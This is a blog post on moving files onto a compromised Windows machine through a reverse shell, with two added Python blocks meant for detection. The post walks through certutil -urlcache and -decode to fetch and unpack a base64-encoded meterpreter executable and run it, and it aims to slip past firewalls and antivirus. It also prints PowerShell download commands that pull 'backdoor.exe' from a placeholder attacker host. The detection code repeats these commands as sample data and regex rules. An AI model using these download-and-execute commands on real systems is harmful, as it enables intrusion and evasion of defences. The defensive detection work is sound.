Thursday 28 June 2018

Windows post exploitation – Data transfer

So you’ve just popped a Windows box and need to move additional files to it...

Generally, in post exploitation, moving/transferring data within *nix is relatively straightforward. Most of the time you’ll have at least curl, wget, nc and/or scp to play with. In Windows, not so much. But are you sure about that?

Here are two of my favourite methods for downloading files to my target box through a shell. My aim here is to use built-in tools and small one-liner commands that do not leave a footprint on the filesystem and that are relatively stable from a non-interactive reverse shell.
Yes, these may leave some sort of temporary artefact, but I’m not including approaches that create a vbs/ps1 script on the target filesystem to download files… There are definitely more ways of doing this, but below are ‘stealthier’ approaches, living off the land…

--> CERTUTIL
This is my favourite method.
Certutil is a built-in command line tool for various certificate-based tasks, with both client and server operations.
I believe it’s been built into Windows since XP/2K3… possibly 2K…

The parameters we can use to download files from a webserver are -urlcache and -split. The intended purpose of -urlcache is to view and delete URL cache entries (such as CRLs), and -split saves the retrieved output to a file.

With both of these, you can point it at a webserver of your liking and download whatever you want!
Below, a successful download of a meterpreter exe:

The webserver will receive two GET requests:

However, the best part is being able to decode base64-encoded payloads without any additional tools. This is all possible using nothing but certutil.

Two of the main certificate formats used in Windows are DER and Base64.
Take the certificate below as an example. This is a Microsoft Root CA certificate exported in Base64. If you view the raw contents of the file, you can see it’s base64-encoded:

You can decode it and output its content on the fly by simply using certutil:

Or, you can decode the contents into a new file with the -decode switch:

After passing these files to my Kali machine, the file command shows that the format has been successfully converted:

So let’s take my meterpreter executable and base64-encode it:

Now, from my reverse shell, I download the base64-encoded meterpreter exe as a text file:

Now I use certutil to decode the base64 content, bringing the file back to its original PE format. Once decoded, I execute it:

Just to prove a point, the file remains intact and works:

What’s great is that this has the potential to bypass firewalls, WAFs and even some of the less reputable AV engines, all using a legitimate, built-in, signed Windows command line tool.
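
From the defender’s side, the thing to take from the screenshots above is that a base64 file which decodes cleanly with certutil does not have to contain a certificate at all. The script below is an added example (not code from the original post, and not part of certutil) that unwraps the PEM-style armour certutil -encode writes (assumed here to be -----BEGIN/END CERTIFICATE----- lines around 64-character base64 lines), base64-decodes the body, and then checks whether the result is really a DER structure or a PE image by looking at its MZ/PE header. Both sample inputs are constructed inline: a five-byte DER SEQUENCE and a fake MZ/PE header stub, neither of which is a real certificate or executable.

```python
import base64
import re
import struct


def build_fake_pe() -> bytes:
    """Constructed stand-in for a PE file: an MZ stub whose e_lfanew field (offset
    0x3c) points at a 'PE\\0\\0' signature. Only enough header for the check below;
    it is not a real executable."""
    header = bytearray(b"MZ") + b"\x00" * 0x3a          # pad to offset 0x3c
    pe_offset = 0x40
    header += struct.pack("<I", pe_offset)               # e_lfanew
    header += b"\x00" * (pe_offset - len(header))        # pad up to e_lfanew
    header += b"PE\x00\x00" + b"\x4c\x01"                # signature + Machine (i386)
    return bytes(header)


# Constructed stand-in for a DER certificate: SEQUENCE { INTEGER 5 }. A real DER
# certificate also begins with a SEQUENCE tag (0x30) followed by its length.
FAKE_DER = bytes.fromhex("3003020105")


def armor(blob: bytes, label: str = "CERTIFICATE") -> str:
    """Wrap bytes in PEM-style armour (assumed to mirror certutil -encode: BEGIN/END
    lines around 64-character base64 lines, CRLF terminated)."""
    b64 = base64.b64encode(blob).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\r\n".join([f"-----BEGIN {label}-----", *lines, f"-----END {label}-----"]) + "\r\n"


def unarmor(text: str) -> bytes:
    """Strip the BEGIN/END lines and all whitespace, then base64-decode, which is
    what certutil -decode does to such a file."""
    body = re.sub(r"-----(?:BEGIN|END)[^-]*-----", "", text)
    body = re.sub(r"\s+", "", body)
    return base64.b64decode(body, validate=True)


def classify(blob: bytes) -> str:
    """Label decoded bytes: 'pe' (MZ stub plus PE signature), 'dos-mz' (MZ but no
    PE signature), 'der' (ASN.1 SEQUENCE whose length matches the data), or
    'unknown'."""
    if blob[:2] == b"MZ":
        if len(blob) >= 0x40:
            e_lfanew = struct.unpack_from("<I", blob, 0x3c)[0]
            if blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
                return "pe"
        return "dos-mz"
    if blob[:1] == b"\x30" and len(blob) >= 2:
        length = blob[1]
        if length < 0x80:                      # short-form length
            return "der" if len(blob) == 2 + length else "unknown"
        n = length & 0x7F                      # long form: number of length bytes
        if n and 2 + n <= len(blob):
            declared = int.from_bytes(blob[2:2 + n], "big")
            if len(blob) == 2 + n + declared:
                return "der"
    return "unknown"


def inspect_armored(text: str) -> str:
    """Decode a certutil-style base64 file and report what it really contains."""
    return classify(unarmor(text))


if __name__ == "__main__":
    print("fake cert ->", inspect_armored(armor(FAKE_DER)))        # der
    print("fake PE   ->", inspect_armored(armor(build_fake_pe())))  # pe
```

A file that carries a CERTIFICATE header but decodes to an MZ/PE image is exactly the artefact the walkthrough above produces, so this is a cheap content check to run over .cer/.txt files found in temp or download directories.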

--> PowerShell
First, the OS and PowerShell version you’re running determine what you can use. Remember, the point of this blog entry is using what’s already there without installing or saving anything additional to disk. To check which PowerShell version is running on your target, use $PSVersionTable.PSVersion as below:

If your major version is 3+ (Windows 8+/Server 2012+) you can use wget, which is an alias for Invoke-WebRequest. It works similarly to the *nix wget command:

wget http://evil.website.com/backdoor.exe -OutFile c:\temp\backdoor.exe

or

Invoke-WebRequest http://evil.website.com/backdoor.exe -OutFile c:\temp\backdoor.exe

Older than PowerShell 3.0? Never fear, the following is here:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOURIP:8000/b.exe','C:\Users\YOURUSER\Desktop\b.exe')" 

--> UPDATE!
Since the Windows 10 April 2018 update, the OpenSSH client is installed by default.
That means, in addition to the two methods above, if you’re able to get a shell on an April 2018 build of Windows 10 you can use scp!

https://www.bleepingcomputer.com/news/microsoft/windows-10-openssh-client-installed-by-default-in-april-2018-update/
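
To round off the certutil, PowerShell and OpenSSH methods above from the detection side, here is an added example (not code from the original post) of the command-line patterns each one leaves in process-creation telemetry. It assumes records in the shape of Sysmon Event ID 1 or Security Event 4688 with command-line logging enabled, and scans a handful of constructed sample records (TEST-NET addresses and made-up file names) against simple rules: certutil -urlcache together with a URL, certutil -decode, the WebClient DownloadFile cradle, the Invoke-WebRequest/wget alias with a URL, and scp.exe invoked with a user@host: target. The record fields and rule names are my own; the benign records show why a bare -urlcache (no URL) or certutil -dump should not fire.

```python
import re

# Constructed sample process-creation records in the shape of Sysmon Event ID 1 /
# Security 4688 (with command-line logging enabled). Addresses are TEST-NET
# (192.0.2.0/24) and file names are made up; none of this is real telemetry.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split http://192.0.2.10:8000/b.txt b.txt"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -decode b.txt b.exe"},
    # Benign: clearing the URL cache and dumping a local certificate file.
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache * delete"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -dump cert.cer"},
    {"image": PS_IMAGE,
     "cmdline": "powershell -c \"(new-object System.Net.WebClient)"
                ".DownloadFile('http://192.0.2.10:8000/b.exe','C:\\Users\\bob\\Desktop\\b.exe')\""},
    {"image": PS_IMAGE,
     "cmdline": "powershell wget http://192.0.2.10/backdoor.exe -OutFile c:\\temp\\backdoor.exe"},
    # Benign PowerShell use.
    {"image": PS_IMAGE, "cmdline": "powershell Get-Process"},
    {"image": r"C:\Windows\System32\OpenSSH\scp.exe",
     "cmdline": "scp.exe C:\\Users\\bob\\report.zip bob@192.0.2.10:/tmp/"},
]

URL = r"(?:https?|ftp)://"

# (rule name, regex on the image path, regex on the command line); both must match.
RULES = [
    ("certutil_url_download", re.compile(r"certutil\.exe$", re.I),
     re.compile(r"[-/]urlcache\b.*" + URL, re.I)),
    ("certutil_base64_decode", re.compile(r"certutil\.exe$", re.I),
     re.compile(r"[-/]decode\b", re.I)),
    ("powershell_webclient_download", re.compile(r"powershell\.exe$", re.I),
     re.compile(r"System\.Net\.WebClient|\.Download(?:File|String|Data)\s*\(", re.I)),
    ("powershell_iwr_download", re.compile(r"powershell\.exe$", re.I),
     re.compile(r"\b(?:Invoke-WebRequest|iwr|wget|curl)\b.*" + URL, re.I)),
    ("openssh_scp_transfer", re.compile(r"scp\.exe$", re.I),
     re.compile(r"\s[\w.-]+@[\w.-]+:", re.I)),
]


def match_event(event):
    """Return the names of every rule whose image and command-line patterns both match."""
    return [name for name, image_re, cmd_re in RULES
            if image_re.search(event["image"]) and cmd_re.search(event["cmdline"])]


def scan(events):
    """Return (cmdline, [rule names]) for each event that triggered at least one rule."""
    findings = []
    for event in events:
        hits = match_event(event)
        if hits:
            findings.append((event["cmdline"], hits))
    return findings


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(", ".join(hits), "<-", cmdline)
```

These rules only work if the command line is actually logged: 4688 omits it unless the "Include command line in process creation events" policy is enabled, and Sysmon records it by default. Matching on the image path as well as the command line keeps a copied or renamed certutil from slipping past the image check alone, so in practice the image rule is best paired with a hash or signer check.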

--> n33dle
